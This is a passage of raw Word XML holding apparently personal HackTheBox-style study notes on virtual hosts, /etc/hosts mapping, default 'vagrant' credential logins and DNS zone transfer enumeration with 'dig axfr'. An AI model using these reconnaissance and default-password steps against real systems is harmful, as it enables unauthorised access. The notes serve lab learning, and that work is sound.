    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003311">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 10.129.227.248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003312">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003313">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Host header tells the web server which website or virtual host to serve.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003314">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003315">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003316">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should They Be the Same?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003317">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Not necessarily. The /etc/hosts entry only ensures that your system resolves s3.thetoppers.htb to 10.129.227.248. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server at 10.129.227.248 decides how to handle requests based on the Host header. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server is configured to serve different content for s3.thetoppers.htb and bare IP requests, the responses will differ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the header (the thing you put in the URL) matters, even if the are "resolved" to the same thing according to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003319">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of adding 10.129.227.248 s3.thetoppers.htb to /etc/hosts is to create a local hostname-to-IP mapping so that your system resolves the domain s3.thetoppers.htb to the IP address 10.129.227.248. This is particularly useful in situations where DNS (Domain Name System) is not available or configured for that domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In labs or CTFs like HackTheBox, Servers are often configured to respond differently based on subdomains or domains like s3.thetoppers.htb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The /etc/hosts entry ensures you can interact with the server as intended, rather than being redirected or blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000331D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003320">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lwntgfk3gdqt" w:id="452"/>
      <w:bookmarkEnd w:id="452"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding users in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003321">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003322">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One way is to look at the /home directory and seeing directories in there. Each user likely has their own directory in /home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003323">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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25">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5lbqdgeko6j8" w:id="453"/>
      <w:bookmarkEnd w:id="453"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003326">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003327">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a user vagrant, then try logging in with password "vagrant", as shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1123">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Blogger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in the password "vagrant"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000332F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9am44g81ut70" w:id="454"/>
      <w:bookmarkEnd w:id="454"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS (port 53)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003330">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003331">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bank HTB. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it wasn't really used at all. So, idk if this is helpful at all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003332">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003333">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If DNS is open on port 53, and you want to look for virtual hosts or subdomains, use this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="716"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dig axfr @&lt;DNS_Server_IP&gt; bank.htb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="716"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace &lt;DNS_Server_IP&gt; with your target IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="716"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "bank.htb" with the hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003337">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003338">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command asks the DNS server at $IP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Please give me all the DNS records you have for the internal zone."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server is misconfigured and allows AXFR zone transfers to anyone (which is bad practice), it will return all records it knows — including hidden subdomains, alternate domains, internal hostnames, and other juicy details that you wouldn't discover with simple enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000333F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003341">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Host vs. Subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003342">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a web server configuration that allows hosting multiple websites or services on the same server and IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003343">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A virtual host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> responds based on the hostname (e.g., www.bank.htb) in the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003344">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003345">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual hosts can be associated with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subdomains (www.bank.htb, admin.bank.htb).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
